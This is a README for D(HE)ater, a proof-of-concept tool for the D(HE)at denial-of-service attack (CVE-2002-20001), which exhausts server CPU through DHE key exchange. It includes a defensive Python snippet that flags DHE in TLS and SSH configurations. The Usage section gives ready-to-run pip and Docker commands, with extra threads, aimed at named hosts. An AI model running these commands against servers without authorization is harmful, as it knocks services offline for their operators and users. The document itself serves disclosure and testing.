D(HE)ater
Summary
D(HE)ater is the proof-of-concept implementation of the D(HE)at attack (CVE-2002-20001). It is an attack tool based on CPU heating: it forces CPU-intensive operations of the ephemeral variant of the Diffie-Hellman key exchange (DHE) in the given cryptographic protocol (e.g. TLS, OpenVPN, SSH).
The CPU-intensive operation (modular exponentiation) is performed twice during the DHE key exchange: once for ephemeral public key generation and once for the shared key calculation. D(HE)ater forces the server to generate its DHE public key, and even to calculate the shared key, without generating a cryptographically correct ephemeral private/public key pair on the client side. This means there is no calculation cost on the client’s side, but a significant calculation cost on the server side. Based on this, a denial-of-service (DoS) attack can be initiated.
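Whether a server is exposed depends on whether it offers finite-field DHE at all. The added example below (not part of D(HE)ater or CryptoLyzer) flags DHE in a list of TLS cipher suite names and in an sshd_config KexAlgorithms line; the function names and sample inputs are constructed for illustration.

```python
import re

TLS_DHE_PREFIXES = ("DHE-", "EDH-", "TLS_DHE_")  # OpenSSL (incl. legacy EDH) and IANA names
SSH_DHE_PREFIX = "diffie-hellman-group"          # fixed-group and group-exchange methods

# Constructed sample inputs (not taken from any real server).
SAMPLE_SUITES = [
    "ECDHE-RSA-AES128-GCM-SHA256",
    "DHE-RSA-AES256-GCM-SHA384",
    "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
    "AES128-SHA",
]
SAMPLE_SSHD = """\
# constructed sshd_config fragment
Port 22
KexAlgorithms curve25519-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha256
"""


def tls_dhe_suites(suites):
    """Return the cipher suites whose key exchange is finite-field DHE."""
    return [s for s in suites if s.startswith(TLS_DHE_PREFIXES)]


def ssh_dhe_kex(sshd_config):
    """Return (explicit, dhe_methods) for the first KexAlgorithms line.

    explicit is False when the line is absent or only modifies the built-in
    defaults ('+', '-' or '^' prefix); the effective list then has to be
    read from the installed build, e.g. with `sshd -T`.
    """
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(?i)kexalgorithms[\s=]+(\S+)$", line)
        if not m:
            continue
        value = m.group(1)
        explicit = value[0] not in "+-^"
        if value[0] == "-":  # listed methods are removed, not enabled
            return explicit, []
        names = value.lstrip("+^").split(",")
        return explicit, [n for n in names if n.startswith(SSH_DHE_PREFIX)]
    return False, []


if __name__ == "__main__":
    print("TLS suites using DHE:", tls_dhe_suites(SAMPLE_SUITES))
    print("SSH (explicit list, DHE methods):", ssh_dhe_kex(SAMPLE_SSHD))
```

An empty result with `explicit` set to False does not mean DHE is off; it means the effective key exchange list comes from the build's defaults.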
Usage
D(HE)ater can be installed directly via pip from PyPI
pip install dheater
dheat --protocol tls ecc256.badssl.com
dheat --protocol ssh ecc256.badssl.com
or can be used via Docker from Docker Hub
docker pull coroner/dheater
docker run --tty --rm coroner/dheater --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --protocol ssh ecc256.badssl.com
You can increase the load by starting extra threads.
dheat --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --thread-num 4 --protocol ssh ecc256.badssl.com
Credits
The implementation is powered by CryptoLyzer, a server cryptographic protocol (TLS, SSL, SSH, DNSSEC) settings analyzer.